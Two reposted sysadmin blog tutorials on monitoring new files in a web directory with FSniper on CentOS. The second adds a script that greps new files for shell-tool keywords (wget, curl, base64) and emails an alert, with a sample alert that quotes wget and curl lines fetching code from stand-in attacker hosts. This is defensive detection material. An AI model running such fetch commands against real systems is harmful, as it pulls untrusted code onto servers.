FSniper - Monitor Newly Created Files in Directory

Fsniper is a good utility that waits for a file to be changed, then executes a command on that file. Means, whenever newly files created, we can do something with that files while fsniper returning the path and file name. From this, we can manipulate the result to execute another task like sending notification or move the files to specific folder based on MIME types.

Example of FSniper usage can be as follows:

1. Categorize newly created files based on MIME into specified directory
2. Notify system administrator that new files has been created via email
3. Move or delete unwanted files based on extension from the directory that being watched
4. Scan new files with ClamAV and send the results via email
5. Much more, you can think by yourself

In this case, I was using following variables:

Server OS: CentOS 5.6 64bit
Directory to be watched: /home/user/public_html
Files being monitored: Images and text files
Action to be taken: Output it to another text files with date, time and files owner

Login into the server and do as follows:

1. Install dependencies via yum:

yum install pcre* file-libs file-devel -y
         

2. Download fsniper using wget. You can find the source at http://freshmeat.net/projects/fsniper :

wget http://projects.l3ib.org/fsniper/files/fsniper-1.3.1.tar.gz

3. Extract the downloaded files:

tar -xzf fsniper-1.3.1.tar.gz
         

4. Enter the directory, configure and install:

cd fsniper-*
./configure
make
make install

5. Fsniper is installed. Try to run it by executing following command:
fsniper --verbose






6. You will see some error telling you that it cant find the configuration files. So we need to build it. Stop the FSniper process by pressing ctrl+C

7. Create the config files under /root/.config/fsniper/ directory:
touch /root/.config/fsniper/config
         

8. We need to tell FSniper to watch all variables that we have mentioned above. So we need to put following lines into /root/.config/fsniper/config using text editor:


watch {
  # we are watching the public_html directory
  /home/user/public_html {
  # turn recursive to true to watch subdirectories as well
  recurse = true
    # lets monitor any MIME started with image
    image/* {
    # handler will execute the scripts while %% is the full path for the new files
    handler = /home/user/new_files_detector %%
    }
    # lets monitor any MIME started with text
    text/* {
    # handler will execute the scripts while %% is the full path for the new files
    handler = /home/user/new_files_detector %%
    }
  }
}




9. As you see on the config files that we just created, the handler will execute a files called “/home/user/new_files_detector” with %% which is replacing the full path of the file. Lets create that scripts:
touch /home/user/new_files_detector
chmod 755 /home/user/new_files_detector
         

10. Open the script using text editor and paste following lines:



output_file='/var/www/html/new_files.txt'

user_owner=`ls -al $1 | awk '{print $3}'`

echo $(date +"%Y-%m-%d") $(date +%k:%M) ">>" $1 "|" $user_owner >> $output_file





11. On scripts above, i want the results to be send to a text files called new_files.txt which can be viewed using web browser (/var/www/html is my document root for web). The following output will appear:


2011-06-27 10:47 >> /home/user/public_html/new_files2.txt | root
2011-06-27 10:49 >> /home/user/public_html/temp.txt | nobody




This is example of my implementation for notification purpose. You can do many things with this tools and hope this tutorial will ease you up. Cheers!





출처 : http://blog.secaserver.com/2011/06/fsniper-monitor-newly-created-files-in-directory/

Detect New Files and Send Notification if Suspicious

This post will required Fsniper installed and running on your box. Please see following post: FSniper – Monitor Newly Created Files in Directory . This is similar to popular paid-version of ConfigServer eXploit Scanner (cxs), which also using inotify functionality which comes since kernel 2.6.13.

I am using Fsniper to check and detect new files and let handler trigger following scripts. This scripts will log any new files which captured by FSniper to /var/www/html/new_files.txt (so i can browse the files using web browser by accessing http://yourwebsite.com/new_files.txt) and then notify me whenever they found any of suspicious words inside the files:

wget, curl, lynx, gcc, perl, sh, cd, mkdir, touch, base64

#!/bin/bash output_file='/var/www/html/new_files.txt' user_owner=`ls -al $1 | awk '{print $3}'` ip=`hostname -i` subject='Found something suspicious' emailto='youremail@domain.tld' message=/tmp/emailmessage.txt   echo $(date +"%Y-%m-%d") $(date +%k:%M) ">>" $1 "|" $user_owner >> $output_file   danger=`egrep -iH '(wget|curl|lynx|gcc|perl|sh|cd|mkdir|touch|base64)' $1 | wc -l`   if [ $danger -gt 0 ]; then echo 'Server:' $(hostname) > $message egrep -iH '(wget|curl|lynx|gcc|perl|sh|cd|mkdir|touch|base64)' $1 >> $message mail -s "$ip | $subject" "$emailto" < $message fi

The email you will received will be similar like this:

From: root To: youremail@domain.tld Subject: 192.168.1.1 | Found something suspicious Email Body: me.myserver.domain.tld /home/user/pu Server: hostn ablic_html/test3.php:wget http://192.168.0.100/bad_thing.php /home/user/public_html/test3.php:curl http://hackers.tld/scripts

This will help you monitor any changes files and make sure you are the first to know if the new files is containing unwanted words. You can modify the script to suit your needs.


출처 : http://blog.secaserver.com/2011/06/detect-new-files-and-send-notification-if-suspicious/